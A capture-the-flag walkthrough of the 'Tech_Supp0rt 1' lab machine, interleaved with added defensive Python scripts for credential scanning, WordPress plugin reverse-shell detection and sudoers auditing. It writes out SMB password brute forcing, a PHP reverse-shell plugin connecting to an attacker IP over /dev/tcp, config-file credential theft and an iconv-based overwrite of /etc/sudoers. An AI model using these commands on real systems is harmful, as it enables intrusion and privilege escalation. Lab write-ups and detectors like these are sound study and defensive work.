CTF Tech_Supp0rt 1

Rustscan

rustscan -a 10.10.75.149

Output:

22/tcp  open  ssh           syn-ack
80/tcp  open  http          syn-ack
139/tcp open  netbios-ssn   syn-ack
445/tcp open  microsoft-ds  syn-ack

gobuster

gobuster dir -u http://10.10.75.149/ -w /usr/share/wordlists/dirb/common.txt -x txt,php,html

Output:

/phpinfo.php          (Status: 200) [Size: 94928]
/server-status        (Status: 403) [Size: 277]
/test                 (Status: 301) [Size: 311] [--> http://10.10.75.149/test/]
/wordpress            (Status: 301) [Size: 316] [--> http://10.10.75.149/wordpress/]

We have two websites:

  • wordpress
  • scam page

wpscan

wpscan --url http://10.10.75.149/wordpress/ --enumerate u

Output:

[+] WordPress version 5.7.2 identified (Insecure, released on 2021-05-12).
...
[+] WordPress theme in use: teczilla
[!] The version is out of date, the latest version is 1.1.4
...
[+] support
...
http://10.10.75.149/wordpress/index.php/index.php/wp-json/wp/v2/users/?per_page=100&page=1
...

smb

crackmapexec smb 10.10.75.149 -u support -p /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

Output:

support:123456

smbmap -H 10.10.75.149 -R -u "support" -p "123456"

Output:

[+] IP: 10.10.75.149:445    Name: 10.10.75.149    Status: Guest session
        Disk                  Permissions    Comment
        ----                  -----------    -------
        print$                NO ACCESS      Printer Drivers
        websvr                READ ONLY
        .\websvr\*
        dr--r--r--    0    Sat May 29 09:17:38 2021    .
        dr--r--r--    0    Sat May 29 09:03:47 2021    ..
        fr--r--r--  273    Sat May 29 09:17:38 2021    enter.txt
        IPC$                  NO ACCESS      IPC Service (TechSupport server (Samba, Ubuntu))
smbclient //10.10.75.149/websvr -U "support"

Password for [WORKGROUP\support]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat May 29 09:17:38 2021
.. D 0 Sat May 29 09:03:47 2021
enter.txt N 273 Sat May 29 09:17:38 2021

8460484 blocks of size 1024. 5695980 blocks available
smb: \> cat enter.txt
cat: command not found
smb: \> more enter.txt
getting file \enter.txt of size 273 as /tmp/smbmore.KPey6E (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->

This hash is "cooked" (obfuscated): 7sKvntXdPEJaxazce9PXi24zaFrLiKWCk

Decoded, it gives:

Scam2021
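The note in enter.txt is a reminder that credentials get left in plaintext on shares that guests or weak passwords can reach. As an added example (not part of the original writeup), here is a small Python scanner that walks a directory tree, for instance a mounted copy of a share, and flags credential-looking lines, printing masked values so the report itself does not leak the secret. The file names, contents and the keyword list are constructed for the example.

```python
import re
import tempfile
from pathlib import Path

# Heuristics for credential material left in plaintext files on a share.
# Constructed for this example; extend the keyword list for your environment.
CRED_PATTERNS = [
    ("keyword", re.compile(r"\b(password|passwd|pwd|creds?|credentials?)\b", re.I)),
    # user:secret pairs such as "admin:S3cretValue", while skipping URLs ("http://...")
    # and timestamps ("09:17:38"): the user part must start with a letter and the
    # secret part must not start with "/" or be followed by another ":".
    ("user:secret", re.compile(r"(?<![\w/])([A-Za-z][\w.-]{2,}):([^\s:/][^\s:]{5,})(?![\w:])")),
]


def mask(secret: str) -> str:
    """Keep only the first and last two characters so the report does not leak the value."""
    if len(secret) <= 4:
        return "*" * len(secret)
    return secret[:2] + "*" * (len(secret) - 4) + secret[-2:]


def scan_text(text: str):
    """Return (line_number, kind, detail) for every credential-looking line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pat in CRED_PATTERNS:
            m = pat.search(line)
            if not m:
                continue
            if kind == "user:secret":
                findings.append((lineno, kind, f"{m.group(1)}:{mask(m.group(2))}"))
            else:
                findings.append((lineno, kind, m.group(1)))
    return findings


def scan_tree(root):
    """Scan every regular file under root (e.g. a mounted share) and report only files with hits."""
    root = Path(root)
    report = {}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        hits = scan_text(path.read_text(errors="replace"))
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report


# Constructed sample share contents, modelled on the note found in the writeup.
SAMPLE_FILES = {
    "websvr/enter.txt": "\n".join([
        "GOALS",
        "=====",
        "1)Make fake popup and host it online",
        "2)Fix subrion site",
        "",
        "IMP",
        "===",
        "Subrion creds",
        "|->admin:EXAMPLEobfuscatedSecret123",
        "Wordpress creds",
        "|->",
    ]),
    "websvr/readme.txt": "Welcome to the web server share. Contact IT at http://intranet.example/help",
}


def demo():
    """Write the sample files to a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as base:
        for rel, content in SAMPLE_FILES.items():
            p = Path(base) / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(content)
        return scan_tree(base)


if __name__ == "__main__":
    for path, hits in demo().items():
        for lineno, kind, detail in hits:
            print(f"{path}:{lineno}: {kind}: {detail}")
```

Point scan_tree() at a mount of the share to run it for real; the user:secret pattern is deliberately strict (letter-initial user, no "/" after the colon) to keep URLs and timestamps out of the report.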

Let's see what Subrion is:
https://www.exploit-db.com/exploits/49876

shell

parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri http://target/panel")

This reverse shell doesn't smell good…

cat /etc/passwd

scamsite:x:1000:1000:scammer,,,:/home/scamsite:/bin/bash


cat /var/www/*/w*/*config*

Wordpress creds:
user: support
password: ImAScammerLOL!123!

wordpress reverse shell

wp_plugin_rv.php

<?php

/**
 * Plugin Name: Reverse Shell Plugin
 * Plugin URI:
 * Description: Reverse Shell Plugin
 * Version: 1.0
 * Author: Vince Matteo
 * Author URI: http://peanutstick.githubio.com
 */

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.8.50.167/4949 0>&1'");
?>

Then listen:

nc -lnvp 4949

Upload it as a plugin.
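A plugin like the one above only works because WordPress runs whatever PHP an administrator uploads. As an added example (not part of the original writeup), here is a Python checker for the defending side that walks a plugins directory and flags PHP files calling command-execution functions or carrying reverse-shell indicators such as a /dev/tcp redirection. The two sample plugins, the directory names and the documentation IP 203.0.113.10 are constructed for the example.

```python
import re
import tempfile
from pathlib import Path

# PHP functions that hand strings to the OS or the interpreter; any of these in an
# uploaded plugin deserves a human review.
DANGEROUS_CALLS = re.compile(
    r"\b(exec|shell_exec|system|passthru|popen|proc_open|eval|assert)\s*\(", re.I
)

# Indicators of a reverse-shell payload rather than ordinary plugin behaviour.
SHELL_INDICATORS = [
    re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),   # bash network redirection
    re.compile(r"\bnc\b[^\n]*\s-e\s"),                      # netcat with -e
    re.compile(r"\bfsockopen\s*\("),                        # raw socket from PHP
    re.compile(r"\bbase64_decode\s*\("),                    # common payload wrapper
]


def scan_plugin_source(source: str):
    """Return one finding per matching line: {'line', 'kind', 'match'}."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        m = DANGEROUS_CALLS.search(line)
        if m:
            findings.append({"line": lineno, "kind": "dangerous-call", "match": m.group(1).lower()})
        for pat in SHELL_INDICATORS:
            m = pat.search(line)
            if m:
                findings.append({"line": lineno, "kind": "reverse-shell-indicator", "match": m.group(0)})
    return findings


def scan_plugin_dir(plugins_root):
    """Scan every .php file under a plugins directory and keep only files with findings."""
    plugins_root = Path(plugins_root)
    report = {}
    for path in plugins_root.rglob("*.php"):
        hits = scan_plugin_source(path.read_text(errors="replace"))
        if hits:
            report[path.relative_to(plugins_root).as_posix()] = hits
    return report


# Constructed samples: one plugin shaped like the payload in the writeup (203.0.113.10
# is a documentation address used as a placeholder) and one harmless plugin.
MALICIOUS_PLUGIN = "\n".join([
    "<?php",
    "/**",
    " * Plugin Name: Totally Legit Plugin",
    " */",
    "exec(\"/bin/bash -c 'bash -i >& /dev/tcp/203.0.113.10/4444 0>&1'\");",
])

BENIGN_PLUGIN = "\n".join([
    "<?php",
    "/**",
    " * Plugin Name: Hello Footer",
    " */",
    "add_action('wp_footer', function () { echo '<p>Hello from the footer</p>'; });",
])


def demo():
    """Write both samples into a temporary plugins directory and scan it."""
    with tempfile.TemporaryDirectory() as base:
        samples = {"legit/legit.php": MALICIOUS_PLUGIN, "hello/hello.php": BENIGN_PLUGIN}
        for rel, src in samples.items():
            p = Path(base) / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(src)
        return scan_plugin_dir(base)


if __name__ == "__main__":
    for path, hits in demo().items():
        for h in hits:
            print(f"{path}:{h['line']}: {h['kind']}: {h['match']}")
```

Run scan_plugin_dir() against wp-content/plugins on a schedule or after every plugin upload; a match is a review trigger, not a verdict, since legitimate plugins occasionally use exec() or base64_decode().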

ssh

ssh scamsite@10.10.75.149

With the last password.

sudo -l
...
(ALL) NOPASSWD: /usr/bin/iconv

https://gtfobins.github.io/gtfobins/iconv/

privesc

LFILE=/etc/sudoers   # target file; assumed from the sudoers rule being written
echo "scamsite ALL=(ALL:ALL) ALL" | sudo iconv -f 8859_1 -t 8859_1 -o "$LFILE"
sudo su
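The root of this privilege escalation is a sudo rule that lets a low-privileged user run a file-writing binary as root without a password. As an added example (not part of the original writeup), here is a Python audit script that parses sudoers user specifications and flags NOPASSWD rules for ALL commands and rules granting binaries that GTFOBins documents as able to write arbitrary files. The sudoers sample and the binary list are constructed for the example and the list is not exhaustive.

```python
import re

# Binaries that GTFOBins documents as able to write arbitrary files when run with
# sudo; a constructed, non-exhaustive sample for this example. iconv is included
# because the sudo rule in the writeup grants it.
FILE_WRITE_CAPABLE = {
    "iconv", "tee", "cp", "mv", "dd", "vim", "vi", "nano", "less",
    "python", "python3", "perl", "bash", "sh", "awk", "find",
}

# user  host = (runas) TAG: cmd1, cmd2   (Defaults, aliases and includes are skipped)
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias", "@include")


def parse_sudoers(text: str):
    """Parse user-specification lines from sudoers text into dicts."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments (and old-style #include lines)
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rules.append({
            "who": m.group("who"),
            "hosts": m.group("hosts"),
            "runas": m.group("runas") or "root",   # sudo's default run-as user
            "tags": {t.rstrip(":") for t in m.group("tags").split()},
            "cmds": [c.strip() for c in m.group("cmds").split(",") if c.strip()],
        })
    return rules


def audit(text: str):
    """Return (who, command, reason) for rules that let a user write files as root."""
    findings = []
    for rule in parse_sudoers(text):
        nopasswd = "NOPASSWD" in rule["tags"]
        for cmd in rule["cmds"]:
            if cmd == "ALL":
                if nopasswd:
                    findings.append((rule["who"], cmd, "NOPASSWD with ALL commands"))
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in FILE_WRITE_CAPABLE:
                reason = "file-write-capable binary"
                if nopasswd:
                    reason += " without password"
                findings.append((rule["who"], cmd, reason))
    return findings


# Constructed sudoers content for the example (not the machine's real file).
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
root            ALL=(ALL:ALL) ALL
%sudo           ALL=(ALL:ALL) ALL
scamsite        ALL=(ALL) NOPASSWD: /usr/bin/iconv
backup          ALL=(root) /usr/bin/rsync
deploy          ALL=(ALL) NOPASSWD: ALL
"""

if __name__ == "__main__":
    for who, cmd, reason in audit(SAMPLE_SUDOERS):
        print(f"{who}: {cmd}: {reason}")
```

Reading /etc/sudoers and /etc/sudoers.d/* needs root; feed each file's text to audit() and treat every finding as a rule to tighten (drop NOPASSWD, or replace the binary with a purpose-built wrapper that cannot take an arbitrary output path).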